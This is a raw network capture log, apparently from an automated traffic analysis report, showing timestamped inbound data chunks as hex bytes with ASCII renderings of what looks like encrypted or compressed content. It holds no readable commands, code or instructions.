                                                                                                                                                2022-09-29 12:51:24 UTC1742INData Raw: d2 c6 eb 35 4d 58 6e 57 7d 53 ce c0 f0 71 c0 85 4d 58 51 49 fa 3f 91 a6 ff 1e c3 20 92 4a 92 ba 2e 51 fe 50 fb 9c 4f c8 a8 41 fe d6 31 0a 0e 8d ff 93 8e 09 10 3a 1a 2d 5d 08 3b 53 61 04 9f 53 98 ec 74 ce d3 8e 0b a1 d0 58 52 0d b9 1d fc 20 c6 4e d6 93 6f 7c 17 fd 67 ad d3 41 f1 8e 72 ad 41 fc f3 1f 87 55 75 b5 23 67 8f f6 90 79 38 6b 45 db a4 20 ae 69 76 f9 19 fb db b0 eb 64 3a f8 79 67 22 d9 55 40 68 de 8e 38 99 05 9f 91 2b ce cf 67 0e eb e2 24 1d ab 72 1f 4b cb 3e 85 d2 20 42 29 bb 51 50 3a e3 14 fa 39 34 d1 0c c4 74 00 a5 a4 2f a5 5b f1 10 35 19 f2 fc 5b c5 69 c1 28 c8 4a 7b 57 02 74 c3 d1 2f fc 94 be 92 e4 97 96 6f e9 50 97 59 1f 94 1a da eb 62 f7 64 44 26 5d 09 1a fd 7b 2c 4d 89 36 1f f2 5b 04 14 a5 a0 9e 65 d2 a3 f6 13 95 a5 ca fc de 2a da 18 27 b7
                                                                                                                                                Data Ascii: 5MXnW}SqMXQI? J.QPOA1:-];SaStXR No|gArAUu#gy8kE ivd:yg"U@h8+g$rK> B)QP:94t/[5[i(J{Wt/oPYbdD&]{,M6[e*'
                                                                                                                                                2022-09-29 12:51:24 UTC1758INData Raw: 0c bb 20 fa ab 97 f9 75 e6 2b 50 87 8c 86 cf 4f 41 53 41 a9 64 46 37 5c 05 9f 66 ad 17 30 ac 16 64 f1 c6 a9 36 f1 c8 15 b0 8a 72 a5 46 7c 5e ce 68 d3 0f 0b f3 ab bf 4e 10 d5 66 e7 2b 94 a8 7f b2 00 18 f1 3e 87 97 92 e8 f2 44 fc 83 16 63 9a fe e9 84 a2 87 62 fa aa 75 d2 a5 0b e5 e6 ff 5e 15 b6 e9 c4 2a d1 cc d6 99 47 51 b7 cd d2 e4 eb ae 7a b7 47 21 63 1b aa 74 f6 19 ce 39 12 48 44 c9 09 cf 33 14 ed 79 d6 49 d2 68 12 67 ad cf c3 f2 65 8c a0 0b c2 39 52 2c 41 fb b7 52 fc 2c 8a 16 91 7d 06 b6 62 ce 74 81 f2 31 cf 80 f6 b3 bf 81 02 a1 39 29 e3 93 f9 e8 3a 17 75 f1 71 97 30 db 6c f9 06 e7 5f 9f d3 d4 72 21 99 7d 43 91 92 30 73 b4 22 65 03 5e 77 58 86 0f ac 72 0e 5b dd ee ca ec 03 3c ec 20 37 09 74 94 6f ff 93 d6 5d d7 c6 c6 08 d2 c9 64 fc d7 e0 62 a7 22 79 38
                                                                                                                                                Data Ascii: u+POASAdF7\f0d6rF|^hNf+>Dcbu^*GQzG!ct9HD3yIhge9R,AR,}bt19):uq0l_r!}C0s"e^wXr[< 7to]db"y8
                                                                                                                                                2022-09-29 12:51:24 UTC1774INData Raw: e0 56 a2 ce 9f b2 37 77 53 3b fe 82 1a f2 47 45 bc 45 1b 40 db 27 09 91 a9 40 25 51 36 60 43 c1 dc c5 4b a3 46 0d 58 67 97 3e 78 87 b0 99 36 95 18 35 98 25 fe 50 02 4b ae 65 fb 3f 99 f4 44 44 92 8e 3c 96 73 14 42 4d 43 8a 29 c8 7d 38 1c 62 30 ee e4 45 d4 46 cd 96 10 f0 be f3 ca 19 07 6f 08 16 4a 63 57 e5 11 df 40 58 49 52 5d ba 4f 20 51 ef c0 7d 89 f8 bd 1d 1c 26 d9 82 ec 6c 44 ac eb 10 c8 ca a2 cb 9d ed 1a b1 74 66 9d 80 32 07 68 76 cd 57 80 0f e9 a4 98 80 35 0b a1 30 a8 24 90 22 32 5b ed 47 3e 79 3d 15 92 de e0 a7 47 90 48 0d ca 0b 09 67 8d d5 71 67 ec db 39 3b be 1c bf 7a 50 6a 99 17 da f6 74 e4 5e 87 b0 80 81 af fd c2 83 9f 1e a7 b8 e2 38 98 58 06 99 b6 44 38 37 01 6b f5 34 fa d4 ec 83 54 c5 4a 71 e2 12 ab 5b 5a 6c 97 3b 0d 9b c1 e7 11 65 cf e9 c7 75
                                                                                                                                                Data Ascii: V7wS;GEE@'@%Q6`CKFXg>x65%PKe?DD<sBMC)}8b0EFoJcW@XIR]O Q}&lDtf2hvW50$"2[G>y=GHgqg9;zPjt^8XD87k4TJq[Zl;eu
                                                                                                                                                2022-09-29 12:51:24 UTC1790INData Raw: 0a bb d8 a9 8d ad e6 f7 2d 91 50 c7 5f 29 6d fd 2a 6b 69 8f 56 08 67 6f 38 ab c5 b7 ad 9a 92 96 1f 6f b2 35 68 99 fd 52 d5 5b fe b5 8e 19 ce 91 0f 6c f4 20 24 1f 79 d5 3f 22 1a 0a c7 73 54 7b 25 2c 88 ff c5 19 b1 d2 c4 2a c4 1a 3c 55 80 1f 4c 51 5e dc 3a 28 75 9f d1 67 0a bd f8 61 9e 1b cb 20 9f 7f ab 44 06 2f 6b 54 ee 7a 18 d3 47 89 d6 18 50 81 7b ee b1 35 a9 8d f9 1f 92 2e ed 68 58 7e e7 31 45 5d c7 a6 2f c1 12 88 7a 0a dc b2 c1 6f 00 bb b4 0d a6 60 ce 04 79 8e 69 17 51 67 1d f3 5e 8d 7b f4 d1 db 80 83 f8 02 17 87 6a 2b 36 99 fe 79 17 43 78 7c 71 25 8d aa fd ab 40 15 7c 55 82 42 f5 fb b0 80 a5 90 4b 61 3d 47 69 68 b7 05 5c b5 ef c9 97 65 1e d9 49 83 b9 57 b0 a2 fb 56 e3 6b 5b 6f 19 2b ac cf de 98 85 5f db fa d7 a4 6a 40 e7 af 04 b0 7d b7 c7 60 65 c0 af
                                                                                                                                                Data Ascii: -P_)m*kiVgo8o5hR[l $y?"sT{%,*<ULQ^:(uga D/kTzGP{5.hX~1E]/zo`yiQg^{j+6yCx|q%@|UBKa=Gih\eIWVk[o+_j@}`e
                                                                                                                                                2022-09-29 12:51:24 UTC1806INData Raw: c6 7e 7e 90 95 cf 20 d5 b9 c6 d0 f3 a5 03 a6 2c 16 f0 d2 77 ec 33 2e 39 9f 0d 3d 4a 64 0c 6c 58 27 00 b3 2a 25 62 cb 8d 0c ab 6f 9f da 39 bb 16 18 95 4c 42 35 7d 51 13 7f 41 5f d2 e3 43 b8 4a 45 9e 57 9c 01 70 a7 6e 02 1b 3e ca b6 fa d8 51 e1 6d 97 2d c0 03 83 2f 82 dd ef 6e 4e 09 32 1a 5a bc 66 f3 4e e2 fb db 81 62 01 97 95 87 7c fa 69 53 bf 7a de a0 c8 17 42 0d e8 c5 c6 88 f0 53 30 23 e8 35 25 30 36 e1 10 d7 1c c2 10 2a a2 d9 fb e2 1e 41 64 fa 04 94 59 db da de af c2 1f 10 0f a3 8b 42 84 ff 67 fe 0c 60 a5 b5 9d fd db a5 65 ef c5 b7 81 2e 9d a3 5a 31 1d 23 dc 52 4a 60 32 e0 ec c4 2d ea 98 b8 15 88 0e 00 75 d3 fc 7e 46 da 96 b2 e1 cb 17 cb 43 54 16 f8 b6 6c ec 61 ed e1 e8 b4 63 07 a5 a3 a1 60 48 39 01 b3 da f2 2e 6b 1a a0 97 91 61 1c 51 11 5a 0e 17 55 7a
                                                                                                                                                Data Ascii: ~~ ,w3.9=JdlX'*%bo9LB5}QA_CJEWpn>Qm-/nN2ZfNb|iSzBS0#5%06*AdYBg`e.Z1#RJ`2-u~FCTlac`H9.kaQZUz
                                                                                                                                                2022-09-29 12:51:24 UTC1822INData Raw: 8c 25 ea a4 8c e2 b3 03 53 56 a0 11 52 2c dc 96 fd e0 2b 13 bb fe b7 48 c2 a8 42 b6 68 12 d9 44 dd 26 b5 56 2f aa 29 f4 7d fd 57 90 81 36 99 08 d6 ab 55 05 0b f8 47 8e 4f 24 39 23 5b d3 0a 7d ee cb a6 02 ae 83 65 88 6b ec 3b f7 e7 3f 1f 49 72 8a b2 8a ae 7d 5b bc fb 70 e9 6f d2 57 13 49 41 75 f2 3d 21 ad fd 40 73 0f 85 66 a9 88 e2 8d 1e 5e 94 25 5d 93 27 93 a9 44 e1 fd ed 82 6c fc 32 51 b1 a8 8e 98 2c 4d 27 ce 14 c1 7b 4a 9a 32 a3 a3 9f 94 7f 3d fe 81 d0 01 6d 59 ba a6 54 1b e7 fc f3 e6 52 eb ae 99 82 8a 7d cd 0e e0 01 33 bf 51 5e f6 61 ad 21 da 3f 19 3b 6a 7e 63 b0 cc 40 00 5e 0d 63 e3 36 7a d5 55 0f 6e 79 34 f9 f1 d0 e3 6b 81 99 4e 9e 2d b5 10 d1 8d 52 9f 50 48 41 29 31 b1 e4 71 eb 41 80 f3 6f ea a5 b4 0f 10 98 96 eb d2 59 c2 8c 93 75 28 3b 44 3d 35 17
                                                                                                                                                Data Ascii: %SVR,+HBhD&V/)}W6UGO$9#[}ek;?Ir}[poWIAu=!@sf^%]'Dl2Q,M'{J2=mYTR}3Q^a!?;j~c@^c6zUny4kN-RPHA)1qAoYu(;D=5
                                                                                                                                                2022-09-29 12:51:24 UTC1825INData Raw: dc ba 3e 87 ec 26 f6 0a ab c9 b0 22 73 71 19 ca a5 f8 d0 f8 2a b4 26 7c 4c 47 d3 72 26 32 00 17 92 7e 5e 7b 8d 26 7d 81 ad 56 5e f9 9c 70 5b c0 dd 00 ff b3 d8 ac 19 76 13 2c 78 e5 d9 d7 27 91 7d ff 0c 79 76 0f 3c 6d 6b b0 3a bc 02 98 1b 12 68 e5 4a 82 ab 9d 8b 01 fe 4a 09 4e 59 8c d6 7d 55 65 c7 8f 1c 51 99 78 3a 02 42 86 12 5c 57 9f 62 9f e3 a8 46 05 8d 8d a6 c2 ef 11 cb a8 6b c6 47 99 a7 7b 4c ee db 3e 1b 02 56 62 ef 5a cd 6c 1c a8 db 44 d0 62 95 6d bf 50 09 5b bd b2 2e 2f 0e 3c c8 d4 af 2a c0 ab b2 dd fe 8e d4 4c 4e e2 5a a2 6a 8d 38 10 2b 40 02 77 28 bb c4 c1 b6 97 9d c3 0c ff f1 51 5c 24 72 6d bd 2d de 65 77 e1 55 ec ca 76 a7 f0 99 af ea bd b5 40 83 c4 b2 22 a4 8f aa 79 f9 10 53 2b 33 60 28 05 67 11 62 2b b8 dd 49 57 61 89 62 5a 2b e1 82 72 02 68 af
                                                                                                                                                Data Ascii: >&"sq*&|LGr&2~^{&}V^p[v,x'}yv<mk:hJJNY}UeQx:B\WbFkG{L>VbZlDbmP[./<*LNZj8+@w(Q\$rm-ewUv@"yS+3`(gb+IWabZ+rh
                                                                                                                                                2022-09-29 12:51:24 UTC1841INData Raw: ab 66 5f 19 34 f9 87 2b 03 0f 80 fa c3 ee 6c 08 af b0 ad cf eb 28 3c a1 63 f5 f0 99 e3 37 bd 2d 37 4d db c3 59 6e fb ed 42 ea 6e ee 51 0f 2d 7b 89 6c db cc b2 f8 c1 e5 22 a0 dd 31 6b 36 72 ea 00 b9 99 2e 50 47 d1 a9 da 5b 4c e0 bc b9 a2 3b a8 87 e3 12 e7 63 21 32 6e fb 4b 8b e4 26 6a 9b 44 63 06 78 e9 34 b7 fd bc 3d c2 fe f3 cc bb 02 d7 93 8a ab 8f 07 0b 87 8f 67 b3 03 92 84 dd 83 b1 f1 53 81 3f d4 ea 49 04 1f 75 11 73 39 ad 70 81 87 12 ec 3a 85 24 7d e2 b9 ab 34 aa 56 de c5 1d e4 0f 27 10 63 e3 ff 83 17 f6 92 d6 08 70 c2 78 db 3e bb 10 a7 ff 12 be 51 8d ea f6 af f8 54 40 f9 31 15 f6 8e 60 0a 93 9c b7 08 0d 95 ed fe 58 9f 35 56 43 38 7a 8f 05 b1 40 7b e7 53 a8 40 71 5c 5c 52 32 3b 8e 91 d3 e8 29 07 18 71 b3 55 dd ee 58 0d 11 90 7f a6 a1 3b 27 29 0d 2f e8
                                                                                                                                                Data Ascii: f_4+l(<c7-7MYnBnQ-{l"1k6r.PG[L;c!2nK&jDcx4=gS?Ius9p:$}4V'cpx>QT@1`X5VC8z@{S@q\\R2;)qUX;')/
                                                                                                                                                2022-09-29 12:51:24 UTC1857INData Raw: d1 c2 37 5a 06 af 09 20 f2 e5 32 57 63 3c 62 ae 1a 43 98 86 2c 95 07 4e a4 fa de 5b 61 30 e8 17 87 3b 4d 64 bd 35 dc 9e 56 78 9b da 5f fa 8c 21 70 97 57 62 db bf b3 db 50 e2 c1 22 e6 69 e5 82 ff 94 68 f3 c6 a7 37 35 9b 7c ed 57 6d af e0 58 0a d8 40 b4 a0 bc 13 09 ce 8e 0f 2c 42 4b a4 82 42 46 25 18 c1 a0 4a 12 09 ee b6 dc e0 4f 2b 59 82 0e ee 17 8d b1 57 c1 4c f4 f8 73 7b 1e d8 32 1d b1 d3 c5 90 90 4d 23 0e 15 d3 14 43 28 db 8b 24 09 f3 26 0f b2 9a 79 93 f7 35 82 21 3c 17 be f5 12 ae 75 cf d3 2e 62 91 2d ba 58 fd eb 3d 50 5f 32 46 ef 9b ac aa f7 17 e2 82 c8 0b a1 5c 5b 53 4f ba cd cd c3 f9 e3 0b 49 15 69 b3 b2 23 dc 08 aa fe 07 36 de 80 86 f0 39 ce 93 a0 27 fa 0b f5 d7 7a a7 4a 02 d0 d2 02 eb 86 0f 28 68 17 3c f7 95 1a 53 fd 36 ae ff 19 fe 38 e1 d9 e4 0c
                                                                                                                                                Data Ascii: 7Z 2Wc<bC,N[a0;Md5Vx_!pWbP"ih75|WmX@,BKBF%JO+YWLs{2M#C($&y5!<u.b-X=P_2F\[SOIi#69'zJ(h<S68
                                                                                                                                                2022-09-29 12:51:24 UTC1873INData Raw: dd 11 eb 16 78 c5 bb dc d5 41 78 c2 47 f0 d9 ee b3 48 16 d1 92 0b dc a8 84 5f f1 72 af 10 b4 53 05 3f 63 0d 07 38 c0 d8 11 19 e7 e0 4d cc 6f 19 2b f9 ec d5 ce 2c fc f1 cf c2 d1 55 ff 8d a3 4e ba 61 e4 92 8f ea ea 2d e6 01 00 ab 9a 7e d4 0d 04 69 f9 b7 0e e1 12 27 3a 6c 80 82 b0 da 50 10 82 c5 48 8e a5 cd 06 2a 22 e0 47 b2 c4 ef c0 e0 a9 4f 63 90 8d 21 c7 27 8b 0d a6 a5 38 3a e9 be 4c e7 6f 3c 30 90 99 4a 28 ef 01 b1 de fa e3 40 09 59 25 0a 15 0d 58 b9 7b 1e 75 1a b3 6b ab 0a c4 22 c5 5b c0 8a bb 7b 0b a7 aa 19 f0 b6 90 e3 34 b8 73 2d ca 02 1a 86 70 60 90 94 9b 64 b7 fc 7e 74 8c 42 05 5b 0b 84 f1 cf e5 73 01 b2 a5 26 41 f3 ff fc 69 67 6e 06 e2 d8 6a 3a 92 92 36 2e 48 20 72 37 b6 25 7b 24 9d 08 d0 5f e9 d1 1e db ff e6 b0 9f 50 78 48 7d 91 0f cd 93 f5 7f 67
                                                                                                                                                Data Ascii: xAxGH_rS?c8Mo+,UNa-~i':lPH*"GOc!'8:Lo<0J(@Y%X{uk"[{4s-p`d~tB[s&Aignj:6.H r7%{$_PxH}g
                                                                                                                                                2022-09-29 12:51:24 UTC1889INData Raw: 1f db 5f 96 30 d9 f2 88 e6 67 49 4f f5 86 ad f1 5c 89 82 91 8b 01 43 4a 82 87 cf 5e 18 68 64 9b 37 64 63 15 2c 9e ca 36 bc 13 b3 70 31 11 a7 cb a2 a3 2f c7 9a 74 f8 37 47 d2 d7 22 9f 02 d0 88 c1 9c b6 9e 1e a9 57 25 9b e9 2a 26 fe cd cb a8 64 53 e5 64 eb 25 33 9e 7b 95 a4 6e a9 a6 60 f6 a4 df 05 5f 56 a7 c0 02 4e ba 7f 4d 6f b7 a8 62 9b be 5d 72 82 21 4a f2 ce 78 6f f8 3b 4b cf 00 5d 1c dc 02 f9 be bb f6 c0 cb cc 17 5c da 1a 89 82 26 43 73 cc 09 da d3 42 aa 9d 4a 58 21 b1 4f 19 14 df a6 44 b6 d0 21 1e 4a 8a 19 23 7b de d1 cb 71 1f 82 d1 41 94 c5 2e 84 7f fd 19 6c bf 42 9b 6c d1 3d 43 2d 08 da 0b 20 7b cc 49 b9 c1 0e ca 18 18 18 cf 87 17 82 08 26 4a 81 64 13 38 07 ac 82 7e 45 72 c7 0c 8a f4 30 62 71 db 92 72 83 dc 96 e6 ee 38 5f 54 4e 60 af 4b 35 38 71 d8
                                                                                                                                                Data Ascii: _0gIO\CJ^hd7dc,6p1/t7G"W%*&dSd%3{n`_VNMob]r!Jxo;K]\&CsBJX!OD!J#{qA.lBl=C- {I&Jd8~Er0bqr8_TN`K58q
                                                                                                                                                2022-09-29 12:51:24 UTC1905INData Raw: 0e 59 b1 28 1e 75 b9 cd 6f 97 5e c5 db 3b 41 6f 61 e2 6c 96 46 ca 38 e2 e3 3f 2c 67 33 d0 bb 76 98 9f 46 2a 88 e9 b6 45 63 1c 46 e8 b4 3c 93 17 1a 63 cf d1 dd a8 6e b9 f4 f2 ac d3 41 c0 54 0a 14 7a 97 40 fd de a0 d9 2d 9a ee 15 5f 3f 01 f0 55 cb 1b 8a 0e 35 ab 5e 2a 2f 61 44 ff 76 37 ab 8f 69 81 c8 f8 7b f7 87 71 cd ca a5 cd 5d b9 e1 21 5a b9 e3 c8 ed 9b 2a 7e b0 04 47 22 a6 d5 83 ce 8c 02 76 f5 7b 1e c7 70 d1 82 30 9e cc 61 25 e8 9c 92 ad 34 6a 15 67 65 e1 86 ce e9 3a 56 45 75 06 1e 8a 13 9d 12 42 51 ec 48 8c bc 4a 65 b5 9a 83 74 ba 69 ff 09 4a 04 00 ff b8 5b 2b 9a 55 36 41 94 cf 64 94 b4 60 ff 74 14 8b 5d af de 92 61 be f7 9a 7e 19 23 36 4b 95 c1 dc ce a5 4b 8d f5 58 ad 06 1c 1e 66 7a 9b 6d 88 eb a2 18 6b f9 71 8d d7 0e ab ed bf 37 ac dd c4 c3 f1 23 b1
                                                                                                                                                Data Ascii: Y(uo^;AoalF8?,g3vF*EcF<cnATz@-_?U5^*/aDv7i{q]!Z*~G"v{p0a%4jge:VEuBQHJetiJ[+U6Ad`t]a~#6KKXfzmkq7#
                                                                                                                                                2022-09-29 12:51:24 UTC1921INData Raw: 40 ff 9f 00 de 36 5e e9 cf 54 49 73 67 97 9f 7a f4 80 4c b2 22 1d 2d bd ae 3c 76 87 d5 80 f2 1b 18 1c 20 64 ef b0 30 10 d5 67 b9 ff 4e a8 3d 90 94 81 bd 57 5d db 65 42 53 e4 5d c2 7f 8b 8b 75 79 66 e7 16 08 79 12 ba e6 f7 c6 de d6 eb ff cf 21 a5 79 3f 87 f8 57 c9 df 3f 7a 4e b2 6b 30 13 f4 bd fc 3f 30 27 b6 e0 d2 fa 4d 20 4f 3b 28 15 20 94 c8 da 6b 95 d1 b0 f9 97 f5 73 f1 66 d5 92 1d 5f 27 a5 24 ab b0 74 3b 6d 87 c7 38 4f 56 76 8f 8c b9 d0 19 b8 4d ca 60 00 bd 25 11 c1 48 7c cd e8 10 e3 f9 bb 11 f4 f1 fe c2 88 5c 7d 41 98 b6 1f 19 fc a7 db 1a 7b 4b f4 cc 68 97 fc 47 63 55 0f 3b 39 8d a4 bd e9 b1 4b 60 a8 c9 e3 b9 f1 83 2e 7a b3 60 45 39 85 6a e5 13 10 ee 65 a1 da 36 f3 a3 43 6e e6 97 07 5f fd 61 b0 a3 ed 94 40 53 1e 5e a4 d5 47 53 49 8d 21 61 55 f5 cb 9f
                                                                                                                                                Data Ascii: @6^TIsgzL"-<v d0gN=W]eBS]uyfy!y?W?zNk0?0'M O;( ksf_'$t;m8OVvM`%H|\}A{KhGcU;9K`.z`E9je6Cn_a@S^GSI!aU
                                                                                                                                                2022-09-29 12:51:24 UTC1937INData Raw: 3d e6 be 52 20 84 94 91 bf cc e1 2d 31 a6 65 8b 76 7f db 8a 5a 53 7a 13 6f 08 4d 6e 60 6b a9 e4 bd fd a9 3d 96 21 61 3d 15 b3 fd 19 f7 17 97 6f 2d 57 c1 78 d9 d3 9c 48 89 1a bf ae 4e 99 e9 f4 40 ea 98 c9 20 ea 6e bf 4c 4f 8a 1f 04 1a fb 4d a0 86 b7 49 93 ee c6 a1 29 c5 d2 94 8d ac c4 0d 2e 93 52 97 ac 9a 0d f4 a9 f5 ef ac 14 fc 97 e7 fc ae 34 00 04 92 c8 4e ab ff 87 79 c2 5d 6a 84 a4 62 9e 6a 81 99 50 7d 20 e2 5a 2f a7 72 f9 2d aa ad d7 36 30 d6 ff 37 06 d1 cb 3d 1c dd 35 c6 61 7a aa b3 7c b6 09 88 39 58 06 0b 19 b5 00 67 6b 7d a3 c6 3c 97 d3 57 4e 67 39 92 75 38 d8 1e 68 73 71 e6 24 3f 74 52 8a a3 a8 4e 00 8f ef b8 89 a7 74 4b 2b 64 03 92 ce 1e 4a a5 74 a5 a2 08 a0 f9 6a 01 42 14 a0 e8 c0 f5 91 23 b5 25 63 61 88 13 c5 2f eb a9 5c de 92 b8 c1 96 5f 30 a2
                                                                                                                                                Data Ascii: =R -1evZSzoMn`k=!a=o-WxHN@ nLOMI).R4Ny]jbjP} Z/r-607=5az|9Xgk}<WNg9u8hsq$?tRNtK+dJtjB#%ca/\_0
                                                                                                                                                2022-09-29 12:51:24 UTC1953INData Raw: d5 e1 53 80 61 a2 80 f0 62 b6 6f 1f fe 25 33 e8 1e b3 5a 3c e5 f2 b3 d0 5f 3e 95 dc 41 86 34 aa d8 4f bd 59 ce ff b2 db ed c1 fe b3 35 31 ca 79 4c b2 38 5f 96 b6 5c bb f1 99 1f 79 51 21 bf f6 83 1b ef cf 78 22 f1 58 42 52 c2 fd 9f 62 16 af 64 3a d6 21 85 d3 fc 9e f8 a9 88 ad b6 79 ce 4f 25 c2 55 f7 8d 56 34 c0 e4 fc 25 f3 8c f0 d2 8d c0 21 28 fe 32 60 da 93 6d a3 38 73 72 81 b4 8a f9 9b 6f 21 91 d8 98 a5 bb f5 f9 d0 40 b1 2f 7c 3d 68 83 9e 40 e4 aa 96 54 9e 56 fa 8b b3 dd f4 97 bb 21 84 ce 44 70 2d 98 6b 85 5f 2d 44 ca 65 59 cf c0 ed ea 28 27 60 06 ae e1 d0 26 33 83 c0 53 20 9e ef 3d 84 99 29 bc 91 ce 23 71 54 6d 27 4f b0 af dc c9 5d a3 20 41 ca 4c c1 62 bc 4b ba 83 65 be 05 13 cd 60 bf 0a 4b 3b 0f 80 a6 3e 23 ae 6e c1 7c 13 83 c5 09 6e f2 08 d9 af 74 6c
                                                                                                                                                Data Ascii: Sabo%3Z<_>A4OY51yL8_\yQ!x"XBRbd:!yO%UV4%!(2`m8sro!@/|=h@TV!Dp-k_-DeY('`&3S =)#qTm'O] ALbKe`K;>#n|ntl
                                                                                                                                                2022-09-29 12:51:24 UTC1969INData Raw: 58 eb b5 78 26 9a 3c 7d fa 7c e5 9b ef d2 8d f2 72 af 96 89 48 9b ac 84 8b b9 82 ad c2 47 61 62 b8 48 77 4b 84 0d f8 85 88 4c 5a bc 6a 5d 7d 07 e3 8a 9f e3 3d 41 6c 6f eb dd a9 5a 9f 48 20 b3 31 5d 38 60 d0 a8 37 f7 85 f7 06 e8 58 a7 71 a9 14 56 8f 02 ed d3 f0 a7 4c dd 3e 0c a3 f7 5c f3 3c ef f8 fa 01 2f 03 72 ad 61 2f 46 d5 84 f4 e4 78 67 11 0c c0 5f 98 aa 11 f0 e3 0e af 81 4f 29 c9 15 11 e4 c1 6a c2 2d 70 c6 6d 18 82 8c cc be 77 8f 94 85 94 c1 21 70 c3 36 69 c9 28 4c a7 ef 87 10 51 f3 7c 1e 3f 30 6f 7f 8c da 4a 9e f8 26 03 08 f5 c6 92 6b 64 90 37 5a ee 83 6b be 98 9d 05 00 98 ac fd 83 d9 62 db 00 7d c8 9a b7 93 b4 cf e2 63 0a cb 8d 9e cc ac 1a b9 3b 42 37 cd 4a 66 9b 42 69 4a d5 24 cc c5 73 c2 d4 71 d5 3b 23 4e 34 06 c2 8e dd 42 d9 54 c6 d5 2a f3 57 a3
                                                                                                                                                Data Ascii: Xx&<}|rHGabHwKLZj]}=AloZH 1]8`7XqVL>\</ra/Fxg_O)j-pmw!p6i(LQ|?0oJ&kd7Zkb}c;B7JfBiJ$sq;#N4BT*W
                                                                                                                                                2022-09-29 12:51:24 UTC1985INData Raw: c1 9c 18 94 36 d1 22 a6 3e 49 65 c5 37 cf ee f6 29 df d3 3f de ab 36 13 27 76 5e ea 25 80 f8 67 8f 87 bc 21 7f 0b 69 76 72 da 47 81 51 83 03 75 c3 5a bd 41 76 36 e9 4a 16 7d 10 41 c4 25 5d dc 6a 4c d3 f4 cb 5b f7 8e 89 af a3 66 55 79 67 bd 3d 3d 17 3d ab ba fb 4f 02 cb 50 20 64 bd d7 40 c5 3e 90 a5 f8 44 f1 f2 6f b5 be 29 00 9f fa 19 03 b4 98 9b 17 1b d0 b0 87 5a f3 ac 9c 27 c2 b3 be bc 88 45 d9 8f 5c fe bc ba 65 45 69 7a 9d b6 17 d7 8c 52 98 b8 31 9d c9 4b 91 0b a8 9f 25 c0 12 e4 8c da 37 77 05 0c 0c ce 69 17 9f ac a8 79 a5 32 17 f4 ea f0 43 78 7a 39 97 7a df f3 13 b2 2a dc 43 30 e0 46 27 cc 8d 6e b5 51 2c 41 b5 06 eb 74 a3 f4 17 43 06 24 19 5d 3e a4 78 3b 54 c4 f0 13 c4 ed e9 3d 66 2a 7a a7 c4 6f 3e 26 85 4b f6 35 9f 3f 76 4a 8a 84 9e 49 cd 4f 96 40 21
                                                                                                                                                Data Ascii: 6">Ie7)?6'v^%g!ivrGQuZAv6J}A%]jL[fUyg===OP d@>Do)Z'E\eEizR1K%7wiy2Cxz9z*C0F'nQ,AtC$]>x;T=f*zo>&K5?vJIO@!
                                                                                                                                                2022-09-29 12:51:24 UTC2001INData Raw: c3 21 d7 a3 a4 eb 7d 5c 6c a2 73 5a e3 56 61 c0 7d f9 ec b5 47 e1 2f 4e a5 19 b8 c7 d7 b7 71 4e f4 5f 16 f2 fe 37 f5 48 e5 db c2 0b 1e 8d 2c 48 c7 86 d5 31 28 e1 06 14 0d 8e 03 f2 c1 dd 7d 98 da ab 72 83 6f c7 f7 fc a2 80 cb 10 a4 05 55 1b 2e e3 37 43 fe 3c 71 77 45 b7 b2 d2 00 6c 3d dc 70 c0 7e de f3 35 94 53 35 4a f4 3c 06 56 00 ec 63 98 4f f1 19 6d af 6a fc 4a c2 e6 da 17 57 61 59 dd ff ef 3a 84 dd fb 0a 8d e6 38 ff 50 aa 35 83 d3 ae d7 f1 fa ac 76 8f 7a ea dc 24 c1 60 b2 c8 f4 74 f5 0f f7 20 d0 3c 4f 15 dd 39 38 89 19 d8 72 ff f2 ae 22 e6 d7 a9 f7 7c a5 8e b7 a6 42 f8 fc 3c 9a d2 32 10 da 03 c6 fe e6 b4 79 d1 82 e8 c1 f4 b2 a7 d5 09 18 1e ec d8 12 30 9e a0 5c ae f2 cb c2 da 9d 33 02 70 1a e2 ab 06 93 3f 0d 0b fc 10 4f eb 1f ce a4 97 cb ad e0 d7 c5 e3
                                                                                                                                                Data Ascii: !}\lsZVa}G/NqN_7H,H1(}roU.7C<qwEl=p~5S5J<VcOmjJWaY:8P5vz$`t <O98r"|B<2y0\3p?O
                                                                                                                                                2022-09-29 12:51:24 UTC2017INData Raw: 8f 46 0e ac ff fd 63 09 bc 52 89 4d fc 4b 79 fa 84 ee d9 3f bc 00 1d bb c9 f6 a2 c4 53 66 59 67 22 23 31 86 94 0a cf 5b 4f 1f 50 1f d6 cf 91 13 0f 9a e6 cf 4c 0b 68 3f c6 83 75 55 bd ae 5a 74 9e 8f 03 3a 2f bd f2 e7 b7 7d 81 fa 1c 25 16 e4 f3 38 4b 65 2e d2 f8 90 5c 10 2c e4 27 b7 ae 93 d3 21 ae be ef c6 d2 8b 94 7a 01 c7 50 98 43 ef 0c c0 81 69 57 0e ff 45 09 28 7d c2 8a 04 7a 58 5b 19 04 d0 15 4c 86 7c 8f b9 bd 53 a5 ed 70 13 65 9c 87 40 03 8f 16 9f 18 7c 1d 43 16 ed f9 53 ce 9d 7e 31 a7 ae bc 07 2d e6 3a e0 94 30 a1 47 f8 dd fd a7 8c dc 74 c4 47 8c d2 1e fd 41 24 91 03 7f 92 98 0d 47 1e 89 ca 7b 14 0a c6 64 52 05 55 0d 13 d7 68 25 23 2c 29 e9 2e 26 77 94 8b 06 83 52 22 16 a9 8b bf 34 a7 4f d6 e0 eb fc 94 65 cf 3e c1 19 7b 68 b3 39 b5 84 ea 74 29 4b 81
                                                                                                                                                Data Ascii: FcRMKy?SfYg"#1[OPLh?uUZt:/}%8Ke.\,'!zPCiWE(}zX[L|Spe@|CS~1-:0GtGA$G{dRUh%#,).&wR"4Oe>{h9t)K
